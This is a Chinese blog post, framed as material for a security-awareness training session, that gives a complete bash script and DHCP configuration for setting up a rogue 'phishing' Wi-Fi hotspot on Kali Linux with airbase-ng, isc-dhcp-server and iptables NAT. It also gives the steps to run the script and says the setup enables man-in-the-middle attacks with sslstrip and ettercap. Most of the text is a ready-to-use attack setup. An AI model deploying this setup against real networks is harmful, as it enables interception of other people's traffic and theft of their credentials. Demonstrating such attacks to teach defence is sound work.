最近做了一个小的安全意识培训,目的是让小伙伴们谨防不信任的Wifi热点,用到了kali linux下的一些小工具。我是用物理机安装的kali linux,然后外接了一个无线网卡wlan2。
具体的技术细节记录一下,具体的shell脚本如下:
#! /bin/bash case $1 in “start”) sleep 1 ifconfig wlan2 down sleep 1 iwconfig wlan2 mode monitor sleep 1 ifconfig wlan2 up sleep 2 airmon-ng start wlan2 sleep 1 airbase-ng -e hellotest -c 11 wlan2 sleep 1 ;; “atup”) sleep 1 ifconfig at0 up sleep 1 ifconfig at0 10.0.0.1 netmask 255.255.255.0 sleep 1 route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1 sleep 1 echo “1” >/proc/sys/net/ipv4/ip_forward sleep 2 dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0 sleep 2 service isc-dhcp-server start sleep 1 ;; “startnat”) sleep 1 iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE sleep 1 iptables -A FORWARD -i wlan2 -o wlan0 -j ACCEPT sleep 1 iptables -A FORWARD -p tcp –-syn -s 10.0.0.0/24 -j TCPMSS –set-mss 1356 sleep 2 ;;*) echo “Usage $0 {start|atup|startnat}” ;; esac
将以上shell脚本保存为cr_wifi.sh,然后依次执行:
./cr_wifi.sh start ./cr_wifi atup ./cr_wifi startnat
执行完之后就可以完成钓鱼热点的创建,其他人链接热点上网的流量都会经过at0,然后利用sslstrip,ettercap就可以进行中间人攻击的一些操作了。
以上shell脚本主要有三个部分:
1,将外接无线网卡的模式修改成监听模式,创建一个SSID为hellotest的无线热点;
2,将网络流量虚拟到at0这块网卡上;启动配置好的DHCP服务器;
3,添加iptables规则,配置NAT。
执行shell脚本之前需要现配置好dhcp服务,DHCP用的是isc-dhcp-server,需要安装一下,它的配置文件(/etc/dhcp/dhcpd.conf)如下:
ddns-update-style none; default-lease-time 600; max-lease-time 7200; authoritative; log-facility local7; subnet 10.0.0.0 netmask 255.255.255.0 { range 10.0.0.1 10.0.0.25; option domain-name-servers 114.114.114.114; # option domain-name internal.example.org; option routers 10.0.0.1; option broadcast-address 10.0.0.250; default-lease-time 600; max-lease-time 7200; }免责声明:本站某些文章、信息、图片、软件等来源于互联网,由本网整理发表,希望传递更多信息和学习之目的,并不意味赞同起观点或证实其内容的真实性以及非法用途。 如设计、版权等问题,请立即联系管理员,我们会给予更改或删除相关文章,保证您的权利。
评论